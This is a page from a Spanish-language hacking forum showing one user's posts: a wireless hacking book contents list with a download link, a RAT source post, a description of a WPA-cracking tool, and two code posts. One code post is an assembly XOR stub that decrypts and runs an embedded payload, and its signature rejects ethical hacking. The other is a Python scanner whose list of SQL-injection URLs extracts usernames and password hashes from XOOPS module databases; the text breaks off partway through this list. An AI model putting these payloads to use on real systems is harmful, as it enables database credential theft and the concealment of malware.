Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ZanGetsu

Páginas 1 2 3 4 ... 19
#21
Off Topic / Re:Con respeto y educación. La ventana modal es ODIOSA
Julio 30, 2017, 01:13:39 PM
A mi también me molesta un poco, sobre todo cuando usan imágenes de servidores literalmente lento, demora mucho la carga,
Quizas podrían hacer algo con el success del ajax, para que cargue de igual de manera aunque no cargue todo, aunque perdería su función
Pero ojo, no todo lo bonito es funcional.

Saludos!
#22
Cursos, manuales y libros / Hacking Exposed Wireless, 2nd Edition
Julio 27, 2017, 10:05:16 AM

Código: php
▼ 1 Introduction to 802.11 Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
802.11 in a Nutshell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
The Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Addressing in 802.11 Packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
802.11 Security Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Discovery Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Hardware and Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
A Note on the Linux Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Chipsets and Linux Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Modern Chipsets and Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Cards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Antennas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Cellular Data Cards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
GPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
▼ 2 Scanning and Enumerating 802.11 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
Choosing an Operating System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

xii Hacking Exposed Wireless: Wireless Security Secrets & Solutions
OS X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Windows Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Vistumbler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
inSSIDer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Windows Sniffi ng/Injection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
NDIS 6.0 Monitor Mode Support (NetMon) . . . . . . . . . . . . . . . . . . . . 50
AirPcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CommView for WiFi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
OS X Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
KisMAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Kismet on OS X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Linux Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Kismet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Mobile Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Online Mapping Services (WIGLE and Skyhook) . . . . . . . . . . . . . . . . . . . . . . 75
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
▼ 3 Attacking 802.11 Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Basic Types of Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Security Through Obscurity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Defeating WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
WEP Key Recovery Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Bringing It All Together: Cracking a Hidden Mac-Filtering,
WEP-Encrypted Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Keystream Recovery Attacks Against WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Attacking the Availability of Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . 111
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
▼ 4 Attacking WPA-Protected 802.11 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Breaking Authentication: WPA-PSK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Breaking Authentication: WPA Enterprise . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Obtaining the EAP Handshake . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
LEAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
PEAP and EAP-TTLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
EAP-TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
EAP-FAST . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
EAP-MD5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Breaking Encryption: TKIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Attacking Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151

Part II Hacking 802.11 Clients
Case Study: Riding the Insecure Airwaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
▼ 5 Attack 802.11 Wireless Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Attacking the Application Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Attacking Clients Using an Evil DNS Server . . . . . . . . . . . . . . . . . . . . . . . . . . 161
Ettercap Support for Content Modification . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Dynamically Generating Rogue APs and Evil Servers with Karmetasploit 167
Direct Client Injection Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Injecting Data Packets with AirPWN . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Generic Client-side Injection with airtun-ng . . . . . . . . . . . . . . . . . . . . 175
Munging Software Updates with IPPON . . . . . . . . . . . . . . . . . . . . . . . 177
Device Driver Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Fingerprinting Device Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Web Hacking and Wi-Fi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
Hacking DNS via XSRF Attacks Against Routers . . . . . . . . . . . . . . . . 197
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201
▼ 6 Taking It All The Way: Bridging the Airgap from OS X . . . . . . . . . . . . . . . . . . . . . . . . . 203
The Game Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
Preparing the Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
Prepping the Callback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Performing Initial Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Preparing Kismet, Aircrack-ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Prepping the Package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Exploiting WordPress to Deliver the Java Exploit . . . . . . . . . . . . . . . . 214
Making the Most of User-level Code Execution . . . . . . . . . . . . . . . . . . . . . . . 217
Gathering 802.11 Intel (User-level Access) . . . . . . . . . . . . . . . . . . . . . . 219
Popping Root by Brute-forcing the Keychain . . . . . . . . . . . . . . . . . . . 220
Returning Victorious to the Machine . . . . . . . . . . . . . . . . . . . . . . . . . . . 226
Managing OS X's Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
▼ 7 Taking It All the Way: Bridging the Airgap from Windows . . . . . . . . . . . . . . . . . . . . . . . 239
The Attack Scenario . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
Preparing for the Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Exploiting Hotspot Environments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Controlling the Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Local Wireless Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 248
Remote Wireless Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Windows Monitor Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
Microsoft NetMon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Target Wireless Network Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Contents xiii

xiv Hacking Exposed Wireless: Wireless Security Secrets & Solutions
 Part III Hacking Additional Wireless Technologies
Case Study: Snow Day . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
▼ 8 Bluetooth Scanning and Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Bluetooth Technical Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Protocol Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Bluetooth Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Encryption and Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Preparing for an Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Selecting a Bluetooth Attack Device . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Active Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Passive Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Hybrid Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
Passive Traffi c Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
Service Enumeration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
▼ 9 Bluetooth Eavesdropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Commercial Bluetooth Sniffi ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Open-Source Bluetooth Sniffi ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
▼ 10 Attacking and Exploiting Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
PIN Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Practical PIN Cracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
Identity Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Bluetooth Service and Device Class . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Bluetooth Device Name . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Abusing Bluetooth Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374
Testing Connection Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
Unauthorized AT Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
Unauthorized PAN Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
Headset Profi le Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
File Transfer Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Future Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
▼ 11 Hack ZigBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
ZigBee Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400
ZigBee's Place as a Wireless Standard . . . . . . . . . . . . . . . . . . . . . . . . . . 400
ZigBee Deployments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 401
ZigBee History and Evolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402

Contents xv
ZigBee Layers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
ZigBee Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
ZigBee Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Rules in the Design of ZigBee Security . . . . . . . . . . . . . . . . . . . . . . . . . 407
ZigBee Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
ZigBee Authenticity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
ZigBee Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
ZigBee Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Introduction to KillerBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411
Network Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Eavesdropping Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Replay Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424
Encryption Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Attack Walkthrough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Network Discovery and Location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Analyzing the ZigBee Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
RAM Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
▼ 12 Hack DECT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
DECT Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
DECT Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
DECT PHY Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
DECT MAC Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Base Station Selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
DECT Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
Authentication and Pairing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445
Encryption Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
DECT Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
DECT Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448
DECT Eavesdropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449
DECT Audio Recording . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 458
▼ A Scoping and Information Gathering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Pre-assessment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Scoping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Things to Bring to a Wireless Assessment . . . . . . . . . . . . . . . . . . . . . . 462
Conducting Scoping Interviews . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Gathering Information via Satellite Imagery . . . . . . . . . . . . . . . . . . . . 465
Putting It All Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469


Enlace de descarga:
Código: php
https://jumpshare.com/v/d9r6fFgGe7mOfyx7wI3i
#23
C# - VB.NET / FkN RAT SRC
Julio 27, 2017, 09:48:24 AM


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#24
ASM / X0R encryption
Julio 27, 2017, 09:41:58 AM
Código: asm
.386
.model flat, stdcall
option casemap:none


include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib


.data
	Key db "uidoisbossuidoisboss" 				  ;key for decrypting
	KeyLength equ $- offset Key
.data?
	Buffer db ?
.code
start:
	jmp Go
Payload:	
	db 00bh, 064h, 08dh, 07fh, 032h, 0d2h, 015h,\ ;
	   069h, 022h, 039h, 00fh, 064h, 0d8h, 055h,\ ;
	   038h, 06ah, 032h, 059h, 030h, 08eh, 04ch,\ ;
	   065h, 077h, 061h, 08ch, 081h, 094h, 095h,\ ;
	   0c6h, 063h, 053h, 01fh, 01ah, 009h, 001h,\ ;
	   010h, 025h, 059h, 01ah, 046h, 05ah, 05fh,\ ;
	   008h, 06ah, 08dh, 0a1h, 09eh, 09bh, 099h   ;
	db 038h, 00bh, 054h, 040h, 05eh, 017h, 06ah,\ ;
	   090h,									  ;
	 


Go:
	mov ebx, KeyLength			;setting the Keylength
	mov ecx, 0					;zeroing the main iterator
	mov edx, 0					;zeroing the key iterator
	lea eax, Key
Cipher:	
	cmp byte Payload[ecx], 090h    	;checking if the byte isn't the NOP
	je Payload					;if so jump to Payload
	cmp ebx, edx				;checking if the key iterator didn't reach the length limit
	jg Skip						;if not the skip zeroing the next instruction
	lea eax, Key				;zero-ing the key iterator
Skip:
	mov DL, [eax]
	xor Payload[ecx], DL		;xoring the byte of payload
	inc ecx						;Iterator++
	inc edx						;KeyIterator++
	inc eax
	jmp Cipher					;returning to the beggining of the loop
end start

The Ethical Hacking is Trash
#25
Redes y antenas / Moscrack - Ruptura de claves WPA
Julio 26, 2017, 05:03:10 PM
Moscrack es una aplicación Perl diseñado para facilitar la ruptura en las claves WPA en paralelo en un grupo de equipos.

Esto se logra mediante el uso de cualquiera de software de agrupación Mosix, SSH o RSH acceso a un número de nodos.

Con el nuevo marco plugin Moscrack, agrietamiento de hash se ha convertido en posible. SHA256/512, DES, MD5 y Blowfish * Unix hashes de contraseñas pueden ser procesadas con el plugin Dehasher Moscrack.

Algunas de las características Moscrack:


  • API Basic permite la monitorización remota
  • Configuración automática y dinámica de nodos
  • Live CD / USB permite el arranque y olvidarse de configuración de nodo dinámico
  • Se puede ampliar mediante el uso de plugins
  • Utiliza aircrack-ng (incluyendo 1.2 Beta) por defecto
  • Soporte CUDA / OpenCL través Pyrit Plugin
  • Apoyo a través de CUDA aircrack-ng-cuda (no probado)
  • No requiere de un agente / daemon en nodos
  • Puede agrietarse / comparar SHA256/512, DES, MD5 y Blowfish hashes través Dehasher Plugin
  • Soporta fácilmente un gran número de nodos
  • Desgined para funcionar durante largos períodos de tiempo
  • No salir de errores / fallos cuando sea posible
  • Admite configuraciones de sistema operativo mixto / protocolo
  • Soporta SSH, RSH, Mosix para la conectividad de nodo
  • Maneja efectivamente los nodos o enlaces rápidos y lentos mixtos
  • Arquitectura independiente
  • Soporta software de clustering Mosix
  • Soporta todos los sistemas operativos más utilizados como nodos de procesamiento
  • Priorización de nodo basado en la velocidad
  • Los nodos pueden ser añadido / borrado / modificado mientras Moscrack se está ejecutando
  • Muy detallado, no esconde nada, registra agresivamente
  • Incluye un "top" como visor de estado
  • Incluye CGI visor de estado web
  • Incluye una GUI X11 básico opcional




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!!
#26
Python / Xoops Scan Sql
Julio 26, 2017, 09:58:12 AM

Código: python
#!/usr/bin/python
#XOOPS Module SQL scanner, checks source for md5's


#Uncomment line 63 for verbose mode. If md5 found
#check manually.


#d3hydr8[at]gmail[dot]com


import sys, urllib2, re, time


print "\n\t   d3hydr8[at]gmail[dot]com XOOPScan v1.0"
print "\t------------------------------------------"


sqls = ["modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*",
	"modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
	"modules/articles/index.php?cat_id=-1%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/articles/index.php?cat_id=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3,4%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/friendfinder/view.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/myads/index.php?pa=view&cid=-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),3%20from%20xoops_users/*",
	"modules/repository/viewcat.php?cid=111111%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/core/viewcat.php?cid=99999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/core/viewcat.php?cid=98989898%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/ecal/display.php?katid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),user,char(112,97,115,115,119,111,114,100,58),password),2%20from%20mysql.user/*",
	"modules/tinyevent/index.php?op=show&id=999999%20union%20select%201,2,3,4,concat(char(117,115,101,114,110,97,109,101,45,45),uname,char(112,97,115,115,119,111,114,100,45,45),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/kshop/product_details.php?id=9999999%20union%20select%201,2,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),4,5,6,7,8,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/camportail/show.php?op=showcam&camid=999999%20union%20select%201,2,3,4,5,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),7,8,9,1,02,3,4,5,6%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/myalbum/viewcat.php?cid=9999999%20union%20select%201111,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/wfsection/print.php?articleid=9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/zmagazine/print.php?articleid=9999999%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),5,6,7,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/rha7downloads/visit.php?cid=-1&lid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/wflinks/viewcat.php?cid=-1%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/jobs/index.php?pa=jobsview&cid=-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
	"modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*",
	"modules/glossaire/glossaire-p-f.php?op=ImprDef&sid=999999%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),2,3%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/myconference/index.php?sid=-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass,char(98,105,116,101,114))%20from%20xoops_users%20where%20uid%20like%201/*",
	"modules/myTopics/print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20",
	"modules/eEmpregos/index.php?pa=view&cid=-00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202",
	"modules/classifieds/index.php?pa=Adsview&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1",
